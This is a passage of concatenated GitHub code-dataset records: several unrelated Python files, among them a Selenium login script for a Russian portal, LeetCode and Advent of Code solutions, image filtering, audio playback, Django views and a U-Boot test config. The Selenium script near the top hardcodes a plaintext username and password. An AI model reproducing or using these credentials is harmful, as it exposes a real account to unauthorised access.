+= value\n elif 34110.1 < value < 35730.0:\n count14 += value\n elif 35730.1 < value < 37360.0:\n count15 += value\n elif 37360.1 < value < 38980.0:\n count16 += value\ncounts = [count1, count2, count3, count4, count5, count6, count7, count8, count9, count10,\n count11, count12, count13, count14, count15, count16]\n# Вывод всех переменных\n# for i, count in enumerate(counts):\n# print(f\"count{i+1}: {round(count, 2)}\")\n# Вывод одной переменной\n# print(round(count1, 2))\n\n# Вход в DOXELL\nexec_path = r\"/Altayka-Doxell/geckodriver.exe\"\nURL = \"https://obr.doxcell.ru:8182/analyzzp/index.jsp\"\nwait_time_out = 15\ndriver_manager = GeckoDriverManager()\ndriver_manager.install()\ndriver = webdriver.Firefox(service=driver_manager.service)\ndriver.get(URL)\n\n# Ищем поле ввода логина\ninput_field = W(driver, wait_time_out).until(E.presence_of_element_located((By.NAME, \"j_username\")))\ninput_field.send_keys(\"gnovokuz\")\n\n# Ищем поле ввода пароля\ninput_field = W(driver, wait_time_out).until(E.presence_of_element_located((By.NAME, \"j_password\")))\ninput_field.send_keys(\"WG7RM3\")\n\n# Нажимаем клавишу Enter, чтобы войти в систему\ninput_field.send_keys(Keys.ENTER)\ntime.sleep(3)\nprint('Ok')\n\nelement = W(driver, wait_time_out).until(E.element_to_be_clickable((By.XPATH, \"/html/body/div[3]/div[5]/div[4]/div[1]/table/tbody/tr[1]/td[1]/img[6]\")))\nelement.click()\ntime.sleep(3)\n# element = W(driver, wait_time_out).until(E.element_to_be_clickable((By.XPATH, \"/html/body/div[3]/div[5]/div[4]/div[3]/table[2]/tbody/tr[1]/td[2]/select/option[48]\")))\n# element.click()\n# time.sleep(3)\n# element = W(driver, wait_time_out).until(E.element_to_be_clickable((By.XPATH, \"/html/body/div[3]/div[5]/div[4]/div[3]/div/table/tbody/tr/td[1]\")))\n# element.click()\n# time.sleep(3)\n# element 
= W(driver, wait_time_out).until(E.element_to_be_clickable((By.XPATH, \"/html/body/div[3]/div[5]/div[4]/div[4]/table[2]/tbody/tr[2]/td[2]/select/option[10]\")))\n# element.click()\n# time.sleep(3)\n# element = W(driver, wait_time_out).until(E.element_to_be_clickable((By.XPATH, \"/html/body/div[3]/div[5]/div[4]/div[4]/div/table/tbody/tr[11]/td[1]\")))\n# element.click()\n# time.sleep(3)\n# element = W(driver, wait_time_out).until(E.element_to_be_clickable((By.XPATH, '//*[@id=\"ref_8440\"]')))\n# element.click()\n\n# def getOverlappingElement(driver: W, element: WebElement) -> Optional[W]:\n# rect = element.rect\n# result = driver.execute_script(\"return document.elementFromPoint(arguments[0], arguments[1]);\",\n# rect['x'] + rect['width'] // 2, rect['y'] + rect['height'] // 2)\n# if result == element:\n# result = None\n# return result\n#\n#\n# overlapping_element = getOverlappingElement(W(driver, wait_time_out), element)\n# if overlapping_element:\n# print(\"Найден перекрывающий элемент:\", overlapping_element)\n# else:\n# print(\"Перекрывающих элементов не найдено\")\n\n\n\n# Ввод значений на лист 7\n# input_field = W(driver, 10).until(E.presence_of_element_located((By.XPATH, '//*[@id=\"sform\"]/form/table/tbody/tr[1]/td[2]/input')))\n# input_field.clear()\n# input_field.send_keys(count1)\n# input_field = W(driver, 10).until(E.presence_of_element_located((By.XPATH, \"\")))\n# input_field.clear()\n# input_field.send_keys(\"220\")\n# wait_variable.until(E.element_to_be_clickable((By.XPATH, \"\"))).click()\n\n# https://obr.doxcell.ru:8180/web/index.jsp\n","repo_name":"Yurgenich87/EXEL","sub_path":"Altayka-Doxell/Altayka_1.py","file_name":"Altayka_1.py","file_ext":"py","file_size_in_byte":6942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"46687733546","text":"from string import ascii_uppercase\n\ndef main():\n \n with open(\"input.txt\") as f:\n lines = f.readlines()\n\n # PART 1\n stack_lines = [x for x in lines if \"[\" in x]\n move_lines = [x.strip() for x in lines if \"move\" in x]\n\n stacks = [[] for _ in range(len(stack_lines[0]) // 4)]\n \n for line in stack_lines:\n for i in range(0, len(line), 4):\n if any(x in line[i:i+3] for x in ascii_uppercase):\n stacks[i//4].append(line[i+1])\n\n moves = []\n\n for line in move_lines:\n num_crates = int(line.split(\" \")[1])\n from_stack = int(line.split(\" \")[3]) - 1\n to_stack = int(line.split(\" \")[5]) - 1\n moves.append({\"num_crates\": num_crates, \"from_stack\": from_stack, \"to_stack\": to_stack})\n\n for move in moves:\n for i in range(move[\"num_crates\"]):\n stacks[move[\"to_stack\"]].insert(i, stacks[move[\"from_stack\"]].pop(0))\n\n print(\"\".join(stacks[x][0] for x in range(len(stacks))))\n\nif __name__ == '__main__':\n main()","repo_name":"alessandrobertani/aoc","sub_path":"Day5/x.py","file_name":"x.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1217170480","text":"# Import libraries\nfrom super_gradients.training import models\n\n# Initialize the model\nbest_model = models.get('yolo_nas_l',\n num_classes=2,\n checkpoint_path=\"checkpoints/Train_2/ckpt_best.pth\",\n )\n##### INFERENCE ON SINGLE IMAGE\n# Test image path\ntest_image = 'dataset/test/images/image_568_cx-22_cy57_r6.png'\n\n# uncomment below line to save the predicted image\n#best_model.predict(test_image, conf=0.5,).save(\"output_folder\")\n\n# uncomment below line to visualize the predicted 
image\nbest_model.predict(test_image, conf=0.5,).show()\n\n###### BELOW CODE EXTRACT THE LABELS AND THE BOUNDING BOX\npredictions = best_model.predict(test_image, conf=0.5)\nprediction_objects = list(predictions._images_prediction_lst)[0]\nbboxes = prediction_objects.prediction.bboxes_xyxy\n\nint_labels = prediction_objects.prediction.labels.astype(int)\nclass_names = prediction_objects.class_names\npred_classes = [class_names[i] for i in int_labels]\nprint(pred_classes)\n\n\n\n","repo_name":"WENDGOUNDI/pcb_defect_inspection","sub_path":"test_custom_model.py","file_name":"test_custom_model.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71962238009","text":"\n# https://leetcode.com/problems/two-sum/ \n\n# 1. Two Sum\n# Easy\n\n# Given an array of integers nums and an integer target, return indices of the two numbers such that they add up to target.\n\n# You may assume that each input would have exactly one solution, and you may not use the same element twice.\n\n# You can return the answer in any order.\n\n\n# Example 1:\n\n# Input: nums = [2, 7, 11, 15], target = 9\n# Output: [0, 1]\n# Output: Because nums[0] + nums[1] == 9, we return [0, 1].\n# Example 2:\n\n# Input: nums = [3, 2, 4], target = 6\n# Output: [1, 2]\n# Example 3:\n\n# Input: nums = [3, 3], target = 6\n# Output: [0, 1]\n\n\n# Constraints:\n\n# 2 <= nums.length <= 103\n# -109 <= nums[i] <= 109\n# -109 <= target <= 109\n# Only one valid answer exists.\n\n#------------------------------------------------------\n# class Solution:\n# def twoSum(self, nums: List[int], target: int) -> List[int]:\n# for val in nums:\n# compliment = target - val\n# if compliment in nums:\n# ind1 = nums.index(compliment)\n# ind2 = nums.index(val)\n# if ind1 != ind2 :\n# return [ind1,ind2]#[nums.index(compliment), nums.index(val)]\n \n# compliment = nums[ind1]\n# nums[ind1] = None\n# ind2 = nums.index(compliment)\n# return [ind1,ind2]\n\n#---------------------------------------------------\n#Solutiom using dictionary mapping \n\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n d = {}\n \n for index,value in enumerate(nums):\n if(target-value in d):\n return(d[target-value],index)\n else:\n d[value] = index","repo_name":"dipbanik/DS-and-Algo","sub_path":"Python/TwoSum.py","file_name":"TwoSum.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4813065637","text":"#!/usr/bin/env python\r\n__author__ = \"Sreenivas Bhattiprolu\"\r\n__license__ = \"Feel free to copy, I appreciate if you acknowledge Python for Microscopists\"\r\n\r\n# https://www.youtube.com/watch?v=QEz4bG9P3Qs\r\n\r\n\r\n\"\"\"\r\n@author: Sreenivas Bhattiprolu\r\n\r\nWhat are features? \r\n\r\n\r\n\"\"\"\r\n\r\n##############################################\r\n#Gabor filter, multiple filters in one. Generate fiter bank. \r\n\"\"\"\r\nFor image processing and computer vision, Gabor filters are generally \r\nused in texture analysis, edge detection, feature extraction, etc. 
\r\nGabor filters are special classes of bandpass filters, i.e., they allow a certain \r\n‘band’ of frequencies and reject the others.\r\n\r\n\r\nksize Size of the filter returned.\r\nsigma Standard deviation of the gaussian envelope.\r\ntheta Orientation of the normal to the parallel stripes of a Gabor function.\r\nlambda Wavelength of the sinusoidal factor.\r\ngamma Spatial aspect ratio.\r\npsi Phase offset.\r\nktype Type of filter coefficients. It can be CV_32F or CV_64F.\r\nindicates the type and range of values that each pixel in the Gabor kernel can hold.\r\nBasically float32 or float64\r\n\r\n\"\"\"\r\n \r\nimport numpy as np\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\n\r\nksize = 5 #Use size that makes sense to the image and fetaure size. Large may not be good. \r\n#On the synthetic image it is clear how ksize affects imgae (try 5 and 50)\r\nsigma = 3 #Large sigma on small features will fully miss the features. \r\ntheta = 1*np.pi/4 #/4 shows horizontal 3/4 shows other horizontal. Try other contributions\r\nlamda = 1*np.pi /4 #1/4 works best for angled. \r\ngamma=0.4 #Value of 1 defines spherical. Calue close to 0 has high aspect ratio\r\n#Value of 1, spherical may not be ideal as it picks up features from other regions.\r\nphi = 0 #Phase offset. I leave it to 0. \r\n\r\n\r\nkernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, phi, ktype=cv2.CV_32F)\r\n\r\nplt.imshow(kernel)\r\n\r\n\r\nimg = cv2.imread('synthetic.jpg')\r\n#img = cv2.imread('BSE_Image.jpg')\r\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\nfimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)\r\n\r\nkernel_resized = cv2.resize(kernel, (400, 400)) # Resize image\r\ncv2.imshow('Kernel', kernel_resized)\r\ncv2.imshow('Original Img.', img)\r\ncv2.imshow('Filtered', fimg)\r\ncv2.waitKey(5000)\r\ncv2.destroyAllWindows()\r\n\r\n\r\n\r\n\r\n","repo_name":"bnsreenu/python_for_microscopists","sub_path":"058-ML_06_03_what is gabor filter.py","file_name":"058-ML_06_03_what is gabor filter.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","stars":3177,"dataset":"github-code","pt":"77"} +{"seq_id":"29420529399","text":"# completa el código de la función\ndef amigos(a,b):\n\n divnumero1=1\n\n divnumero2=1\n\n sumadivnumero1=0\n\n sumadivnumero2=0\n\n while divnumero1 0\n except Exception as e:\n CrawlerLogger.logger.error('update article {0} failed\\n'.format(update_sql) + str(e))\n MysqlLogger.logger.error('update article {0} failed\\n'.format(update_sql) + str(e))\n\n def get_latest_articles(self, total=3):\n \"\"\"\n\n :param total: 需要的文章数量\n :return: 获取到的文章\n \"\"\"\n sql = 'SELECT * FROM bai_article ORDER BY publishTime DESC LIMIT {0}'.format(total)\n CrawlerLogger.logger.info('get latest ' + str(total) + ' articles: ' + sql)\n MysqlLogger.logger.info('get latest ' + str(total) + ' articles: ' + sql)\n article_records = self.db.query(sql)\n articles = Article.to_articles(article_records)\n return articles # \n # 待补充 total 超出总记录数的处理\n\n\nif __name__ == '__main__':\n\n CrawlerLogger.set_up('logs/crawler.log')\n MysqlLogger.set_up('logs/mysql.log')\n dao = ArticleDao()\n dao.import_from_file('docs/bai_article2') ## 测试 insert\n # one_article = dao.get_latest_articles(1)\n # print \"one_article's type(expected ):\", type(one_article)\n # print \"one_article's type(expected ):\", 
type(one_article[0])\n","repo_name":"puddingandsesame/lilac","sub_path":"bin/crawler/ArticleDao.py","file_name":"ArticleDao.py","file_ext":"py","file_size_in_byte":7498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2204914384","text":"import pyaudio\r\nimport time\r\nimport wave\r\n\r\nfrom pydub import AudioSegment\r\nfrom pydub.playback import play\r\n\r\nCABLE_A = \"CABLE-A Input (VB-Audio Cable A\"\r\n\r\n\r\ndef get_device_by_name(p, name):\r\n for i in range(p.get_device_count()):\r\n if p.get_device_info_by_index(i)[\"name\"] == name:\r\n print(p.get_device_info_by_index(i))\r\n return i\r\n return None\r\n\r\np = pyaudio.PyAudio()\r\nsegment = AudioSegment.from_file(\"warmup.wav\")\r\nframe_size = segment.channels * segment.sample_width\r\nsegment_iterator = 0\r\nprint(segment.frame_count())\r\n\r\nwave_file = wave.open(\"warmup.wav\", \"rb\")\r\nprint(wave_file.getnframes())\r\n\r\nprint(\"AADFSF\")\r\n\r\n\r\nprint(len(segment))\r\n# play(segment)\r\n\r\ndef callback(in_data, frame_count, time_info, status):\r\n global segment\r\n global segment_iterator\r\n global wave_file\r\n global frame_size\r\n wave_data = wave_file.readframes(frame_count)\r\n\r\n print(segment.frame_width)\r\n\r\n data = segment._data[segment_iterator * segment.frame_width:(segment_iterator + frame_count) * segment.frame_width]\r\n\r\n print(f\"data comp {wave_data == data}\")\r\n print(len(wave_data))\r\n print(len(data))\r\n\r\n segment_iterator += frame_count\r\n\r\n return data, pyaudio.paContinue\r\n\r\nstream = p.open(\r\n format = p.get_format_from_width(segment.sample_width),\r\n channels=segment.channels,\r\n rate=segment.frame_rate,\r\n output=True,\r\n stream_callback=callback\r\n # output_device_index=get_device_by_name(p, CABLE_A)\r\n)\r\n\r\nprint(\"STarting the stream\")\r\n\r\nstream.start_stream()\r\n\r\nwhile stream.is_active():\r\n time.sleep(0.1)\r\n\r\nprint(\"Shutting down\")\r\n\r\nstream.stop_stream()\r\nstream.close()\r\np.terminate()\r\n","repo_name":"admiralbolt/stream-stuff","sub_path":"scratch/audio_segment_playback.py","file_name":"audio_segment_playback.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"43372609828","text":"import pandas as pd\n\n\n# Write a solution to calculate the number of unique subjects each teacher teaches in the university.\n# Return the result table in any order.\n# -----------------\n# Teacher table:\n# +------------+------------+---------+\n# | teacher_id | subject_id | dept_id |\n# +------------+------------+---------+\n# | 1 | 2 | 3 |\n# | 1 | 2 | 4 |\n# | 1 | 3 | 3 |\n# | 2 | 1 | 1 |\n# | 2 | 2 | 1 |\n# | 2 | 3 | 1 |\n# | 2 | 4 | 1 |\n# +------------+------------+---------+\n# Output:\n# +------------+-----+\n# | teacher_id | cnt |\n# +------------+-----+\n# | 1 | 2 |\n# | 2 | 4 |\n# +------------+-----+\n\n\ndef count_unique_subjects(teacher: pd.DataFrame) -> pd.DataFrame:\n # Drop all duplicates, we don't need them ->\n teacher.drop_duplicates(subset=['teacher_id', 'subject_id'], inplace=True)\n # -> count every unique combination of teacher_id + subject_id ->\n teacher['cnt'] = teacher.groupby(by='teacher_id')['subject_id'].transform('count')\n # -> every teacher_id on the same row as cnt, we only need One Id.\n teacher.drop_duplicates(subset=['teacher_id', 'cnt'], inplace=True)\n return teacher[['teacher_id', 
'cnt']]\n","repo_name":"Massprod/leetcode-testing","sub_path":"leetcode_problems/p2356_number_of_unique_subjects_taught_by_each_teacher_pandas.py","file_name":"p2356_number_of_unique_subjects_taught_by_each_teacher_pandas.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27434456619","text":"# ************************************************\n# username : smmehrab\n# fullname : s.m.mehrabul islam\n# email : smmehrabul-2017614964@cs.du.ac.bd\n# institute : university of dhaka, bangladesh\n# reg : 2017614964\n# ************************************************\n\nclass CountSorter:\n\n def __init__(self) -> None:\n pass\n\n def sort(self, values:list) -> list:\n \n n = len(values)\n vmax = int(max(values))\n vmin = int(min(values))\n vrange = vmax-vmin+1\n\n # init\n count = [0]*vrange\n output = [0]*n\n\n # count\n for value in values:\n count[value-vmin] += 1\n \n # cumulative count\n for index in range(1, vrange):\n count[index] += count[index-1]\n\n # sorted placement (reverse)\n for index in range(len(values)-1, -1, -1):\n cindex = values[index]-vmin\n oindex = count[cindex]-1\n output[oindex] = values[index]\n count[cindex] -= 1\n\n return output\n","repo_name":"smmehrab/problem-solving","sub_path":"codes/_algorithms/sort/count_sort.py","file_name":"count_sort.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"18042243539","text":"__author__ = \"Lei Cai\"\n__copyright__ = \"Copyright 2021, GeospaceLab\"\n__license__ = \"BSD-3-Clause License\"\n__email__ = \"lei.cai@oulu.fi\"\n__docformat__ = \"reStructureText\"\n\nimport datetime\nimport geospacelab.express.omni_dashboard as omni\n\ndt_fr = datetime.datetime.strptime('20160321' + '0600', '%Y%m%d%H%M')\ndt_to = datetime.datetime.strptime('20160330' + '0600', '%Y%m%d%H%M')\n\nomni_type = 'OMNI2' # 'OMNI' or 'OMNI2'\nomni_res = '1min' # '1min' or '5min'\nload_mode = 'AUTO'\ndashboard = omni.OMNIDashboard(\n dt_fr, dt_to, omni_type=omni_type, omni_res=omni_res, load_mode=load_mode\n)\n\n# data can be retrieved in the same way as in Example 1:\ndashboard.list_assigned_variables()\nB_x_gsm = dashboard.get_variable('B_x_GSM', dataset_index=0) # Omni dataset index is 1 in the OMNIDashboard. 
To check other dashboards, use the method \"list_datasets()\"\nprint(B_x_gsm)\n\ndashboard.quicklook()\n\ndashboard.list_assigned_variables()\n\n# save figure\ndashboard.save_figure()","repo_name":"JouleCai/geospacelab","sub_path":"examples/demo_omni_data.py","file_name":"demo_omni_data.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"77"} +{"seq_id":"26076364322","text":"\nfrom django.urls import path\nfrom blogs import views\n\nurlpatterns = [\n path('blog/categories/', views.home, name='home'),\n path('blog/categories/', views.detail, name='detail'),\n path('blog/posts/', views.posts, name='post_home'),\n path('blog/posts/', views.posts_details, name='posts_details'),\n path('blog/authors/', views.authors),\n path('blog/authors/', views.authors_details),\n path('blog/posts/new/', views.createblog_form, name='new_post'),\n path('blog/category/new/', views.category_form, name='new_category'),\n\n]\n","repo_name":"E-Hammond/django_blog-demo-","sub_path":"blogs/urls - Copy.py","file_name":"urls - Copy.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15474719240","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Codec:\n\n def serialize(self, root: Optional[TreeNode]) -> str:\n \"\"\"Encodes a tree to a single string.\n \"\"\"\n string = []\n def preorder(node):\n if not node:\n string.append(\"#\")\n string.append(\",\")\n return None\n string.append(str(node.val))\n string.append(\",\")\n preorder(node.left)\n preorder(node.right)\n \n preorder(root)\n return \"\".join(string)\n\n def deserialize(self, data: str) -> Optional[TreeNode]:\n \"\"\"Decodes your encoded data to tree.\n \"\"\"\n string = data.split(\",\")\n counter = -1\n \n def buildtree(string):\n nonlocal counter\n counter += 1\n if string[counter] == \"#\":\n return None\n node = TreeNode(int(string[counter]))\n node.left = buildtree(string)\n node.right = buildtree(string)\n return node\n \n return buildtree(string)\n\n# Your Codec object will be instantiated and called as such:\n# Your Codec object will be instantiated and called as such:\n# ser = Codec()\n# deser = Codec()\n# tree = ser.serialize(root)\n# ans = deser.deserialize(tree)\n# return ans","repo_name":"Tolosa-mitiku/leet-code","sub_path":"0449-serialize-and-deserialize-bst/0449-serialize-and-deserialize-bst.py","file_name":"0449-serialize-and-deserialize-bst.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74227333047","text":"# Razminka 1\ndef maximum(a):\n more = a[0]\n for i in a:\n if more < i:\n more = i\n return more\n\n\na = [10, 27, 42, 36]\nmax_value = maximum(a)\nprint(max_value)\n\n\n\n# Razminka 2\na = [10, 20, 30, 40]\nfor i in range(len(a)):\n print(f\"({i}, {a[i]})\")\n","repo_name":"ZloiGaMeR/PythonCourseATIS","sub_path":"Practice/ismartynenko/razminka_enum.py","file_name":"razminka_enum.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32094857413","text":"import certifi\nimport ssl\nimport geopy.geocoders\nfrom geopy.geocoders import GoogleV3\nfrom geopy.exc import GeocoderTimedOut\nimport pandas as pd\nimport os\nfrom time import 
sleep\n\npd.set_option('display.max_columns',30)\n\nfrom config.secrets import APIKEY\n\nSRC_PATH = os.path.dirname(__file__)\nPROJECT_PATH = os.path.split(SRC_PATH)[0]\n\nfrom resources.json_components import out_start_str, out_end_str, store_str\n\n\ndef join_addrs(x):\n return '{} {} {}'.format(*x)\n\n\ndef convert_store_address():\n # Read stores data\n path = os.path.split(os.path.dirname(__file__))[0]\n store_list_fn = os.path.join(path, r'resources', r'new-store-list.xlsx')\n\n # TODO: FIX COLUMNS\n\n # columns = ['name', 'street', 'city', 'state']\n # store_list_df = pd.read_csv(store_list_fn, sep='\\t', header=0)\n assert os.path.isfile(store_list_fn)\n print('Reading ',store_list_fn)\n store_list_df = pd.read_excel(store_list_fn, engine='openpyxl')\n\n # store_list_df.fillna('', inplace=True)\n # store_list_df.dropna('', inplace=True)\n store_list_df = store_list_df.iloc[:, :4].dropna()\n store_list_df = store_list_df.sort_values(['name'])\n # store_list_df['address'] = store_list_df[['street', 'city', 'state']].apply(join_addrs, axis=1)\n print(store_list_df.columns.to_list())\n print(store_list_df.head())\n assert store_list_df.columns.to_list() == ['name', 'address', 'longitude', 'latitude']\n\n # create store list json\n ctx = ssl.create_default_context(cafile=certifi.where())\n geopy.geocoders.options.default_ssl_context = ctx\n geolocator = GoogleV3(api_key=APIKEY)\n n_stores = store_list_df.shape[0]\n print('Number of stores in file:', n_stores)\n store_addrs = []\n stores_without_location = 0\n i = 1\n for storeid in range(n_stores):\n prop = {\n 'category': 'grocery',\n 'description': '',\n 'name': '',\n 'address': '',\n 'phone': '',\n 'website': '',\n 'storeid': 0,\n 'lat': 0,\n 'long': 0\n }\n id = str(i).zfill(3)\n prop['storeid'] = id\n prop['name'] = store_list_df.iloc[storeid]['name']\n prop['address'] = store_list_df.iloc[storeid].address\n prop['lat'] = store_list_df.iloc[storeid].latitude\n prop['long'] = store_list_df.iloc[storeid].longitude\n if not prop['long']:\n try:\n location = geolocator.geocode(prop['address'])\n # location = geolocator.geocode(prop['address'], timeout=5)\n prop['lat'] = location.latitude\n prop['long'] = location.longitude\n sleep(0.5)\n except Exception as e:\n stores_without_location += 1\n print(e)\n print('No address for:', prop['name'])\n print(prop['address'])\n if prop['long']:\n store_addrs.append(store_str.format(**prop))\n i += 1\n\n json_file = out_start_str + ','.join(store_addrs) + out_end_str\n print('-' * 50)\n print(json_file)\n print('-' * 50)\n print('Did not find location for {} stores'.format(stores_without_location))\n out_fn = os.path.join(PROJECT_PATH, 'resources', 'results.json')\n with open(out_fn, 'w') as f:\n f.write(json_file)\n return json_file\n\n\ndef get_address_coordinates(address):\n \"\"\" Use google API to get the longitude and latitude of an address \"\"\"\n lat = 0\n long = 0\n return lat, long\n\n\nif __name__ == '__main__':\n convert_store_address()\n","repo_name":"Gabby-D/cc-store-locator","sub_path":"src/create_store_list_json.py","file_name":"create_store_list_json.py","file_ext":"py","file_size_in_byte":3540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5994973636","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom rivertrace import trace\nfrom rivertrace.functions import plot_matrix, parse_netcdf, log, classify_river, plot_matrix_select, get_pixel_values\n\nturb = \"data/turbidity.nc\"\nswi = 
\"data/swi.nc\"\nrough_river = \"data/river.geojson\"\n\nswi_data, lat, lon = parse_netcdf(swi, \"rhos_swi\", \"lat\", \"lon\")\nplot_matrix(swi_data, title=\"SWI\")\n\nlog(\"Reading data from file {}\".format(turb))\nmatrix, lat, lon = parse_netcdf(turb, \"turb\", \"lat\", \"lon\")\n\nlog(\"Create boolean pixel map of water/ non-water pixels\")\nboolean = matrix.copy()\nboolean[boolean == 0] = np.nan\nboolean[~np.isnan(boolean)] = True\nboolean[np.isnan(boolean)] = False\nboolean = boolean.astype(bool)\nplot_matrix(boolean, title=\"Water classification plot\")\n\nlog(\"Update boolean pixel map to river pixels by applying max distance from rough river path\")\nboolean, start, end = classify_river(boolean, lat, lon, rough_river, buffer=0.001, direction=\"N\")\nplot_matrix(boolean, title=\"River classification plot\")\n\nlog(\"Manually remove any incorrectly classified water pixels\")\nboolean = plot_matrix_select(boolean)\n\npath = trace(boolean, start, end)\n\nlog(\"Plot results\")\noutput = swi_data.copy()\nfor p in path:\n output[p[0], p[1]] = 2\n\nplot_matrix(output, title=\"River classification plot\")\n\nlog(\"Plot profile of input values\")\nvalues = np.array(get_pixel_values(path, matrix, min=0, max=10000, group=1))\nplt.plot(values)\nplt.show()\n","repo_name":"JamesRunnalls/river-trace","sub_path":"tests/satellite.py","file_name":"satellite.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72835551929","text":"from django.shortcuts import render,redirect\nfrom django.contrib import messages \nimport random\nfrom .models import *\n\n# other models \nfrom property.models import PropertyModel\nfrom managers.models import ManagerModel\nfrom owners.models import OwnerModel\nfrom applications.models import ApplicationModel\n\n# Create your views here.\ndef PropertyDocuments(request):\n properties_files = PropertyDocument.objects.all().order_by('-date_created')\n\n # forms data \n properties = PropertyModel.objects.all()\n\n context = {\n \"properties_files\" : properties_files,\n \"properties\" : properties\n }\n\n return render(request,'Documents/property_documents.html',context)\n\n# Property Files Form \ndef PropertyFilesForm(request,id):\n property = PropertyModel.objects.get(id = id)\n\n # save Property File \n if request.method == 'POST' and 'submit_file' in request.POST:\n save_property_file = PropertyDocument()\n save_property_file.property = property\n save_property_file.name = request.POST.get('name')\n save_property_file.description = request.POST.get('file_description')\n save_property_file.file = request.FILES['file']\n save_property_file.save()\n messages.success(request,'New File Added') \n return redirect('property-documents')\n\n context = {\n \"property\" : property\n }\n return render(request,'forms/property_files_form.html',context)\n \n","repo_name":"ThulaneNcholo/AssetHQ01","sub_path":"server/Documents/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42025196891","text":"# coding:utf8\n\n# 为了解决markdown编码错误问题\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf8')\n\nimport tornado.web\nfrom BackBaseHandler import BackBaseHandler\nfrom conf.conf import home_dir, back_dir\n\n\nclass BackIntroduceHandler(BackBaseHandler):\n '''\n 负责修改保存简介\n '''\n @tornado.web.authenticated\n def get(self):\n introduce_content = open(home_dir + 
\"md/introduce/introduce.md\", 'r').read()\n self.render(\"../page/back/introduce.html\", introduce=introduce_content, back_dir=back_dir, info_message=\"\")\n\n\n @tornado.web.authenticated\n def post(self):\n info_message = \"
保存成功
\"\n # 修改并保存简介\n introduce_content = self.get_argument(\"introduce\", None)\n open(home_dir + \"md/introduce/introduce.md\", 'w').write(introduce_content)\n\n introduce_content = open(home_dir + \"md/introduce/introduce.md\", 'r').read()\n self.render(\"../page/back/introduce.html\", introduce=introduce_content, back_dir=back_dir,\n info_message=info_message)\n\n","repo_name":"qux-bbb/simple_blog","sub_path":"blog/handler/BackIntroduceHandler.py","file_name":"BackIntroduceHandler.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42254468281","text":"import typing\nimport tbot\nfrom tbot.machine import channel, board, linux\nfrom tbot.tc import git\n\nif tbot.selectable.LabHost.name == \"pollux\":\n # Use pollux specific config\n import pollux as lab\nelse:\n raise NotImplementedError(\"Board not available on this labhost!\")\n\nub_env = [\n {\"name\" : \"netdev\", \"val\" : \"eth0\"},\n]\n\nclass socrates(lab.Board):\n name = \"socrates\"\n connect_wait = 2.0\n date = \"20200508\"\n\nclass socratesUBootBuilder(lab.UBootBuilder):\n name = \"socrates-builder\"\n defconfig = \"socrates_defconfig\"\n toolchain = \"powerpc\"\n remote = \"git@gitlab.denx.de:u-boot/u-boot.git\"\n\n testpy_boardenv = r\"\"\"# Config for socrates\n# Set sleep time and margin\nenv__sleep_time = 20\nenv__sleep_margin = 2\n\"\"\"\n\n def do_checkout(self, target: linux.Path, clean: bool, rev: typing.Optional[str]) -> git.GitRepository:\n branch = \"master\"\n return git.GitRepository(\n target=target, url=self.remote, clean=clean, rev=branch\n )\n\n def do_patch(self, repo: git.GitRepository) -> None:\n repo.am(linux.Path(repo.host, \"/home/hs/abb/mainlining/socrates/patches/20200508\"))\n\nclass socratesUBoot(lab.UBootMachine):\n name = \"soc-ub\"\n prompt = \"=> \"\n autoboot_prompt = None\n build = socratesUBootBuilder()\n\n def do_set_env(\n self, ub: board.UBootShell\n ) -> bool:\n ub.env(\"serverip\", tbot.selectable.LabHost.serverip[\"socrates\"])\n ub.env(\"netmask\", \"255.255.255.0\")\n ub.env(\"ipaddr\", tbot.selectable.LabHost.boardip[\"socrates\"])\n\n for env in ub_env:\n ub.env(env[\"name\"], env[\"val\"])\n\n\nBOARD = socrates\nUBOOT = socratesUBoot\nfrom tbot import log_event\nlog_event.doc_tag(\"board_name\", BOARD.name)\nlog_event.doc_tag(\"ub_prompt\", 